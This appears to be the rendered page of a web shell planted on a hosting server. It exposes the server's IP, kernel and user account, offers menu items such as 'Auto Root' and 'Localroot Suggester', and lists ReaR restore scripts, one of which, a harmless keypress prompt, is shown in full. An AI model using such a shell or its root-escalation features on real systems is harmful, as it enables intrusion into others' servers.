Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.158
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
restore /
DP /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
300_create_dp_restore_fs_list.sh
1.19
KB
-rw-r--r--
2026-04-01 09:39
400_restore_with_dp.sh
2.08
KB
-rw-r--r--
2026-04-01 09:39
450_restore_via_gui.sh
842
B
-rw-r--r--
2026-04-01 09:39
460_press_y_to_continue.sh
612
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# 460_press_y_to_continue.sh unset REPLY while true ; do # Use the original STDIN STDOUT and STDERR when 'rear' was launched by the user # because 'read' outputs non-error stuff also to STDERR (e.g. its prompt): read -t $WAIT_SECS -r -n 1 -p "Press 'y' to continue or wait for $WAIT_SECS seconds timeout: " 0<&6 1>&7 2>&8 rc=$? # In case of timeout 'read -t' results exit code 142 = 128 + 14 (14 is SIGALRM timer signal from alarm(2)): (( $rc == 142 )) && break (( $rc == 1 )) && break case $REPLY in (y|Y) break ;; (*) continue ;; esac done UserOutput ""